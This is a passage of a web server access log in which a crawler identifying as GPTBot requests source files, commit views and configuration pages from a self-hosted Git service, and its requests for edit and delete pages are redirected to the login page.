"/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11134] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:16:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:16:34:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:34:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:34:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:34:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:16:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:16:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:16:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11333] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 6798] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" +[17/Feb/2026:16:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12945] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=closed" +[17/Feb/2026:16:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13661] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21787] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:16:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14442] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:16:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10924] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12878] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:34:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15688] [Gzip 8.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 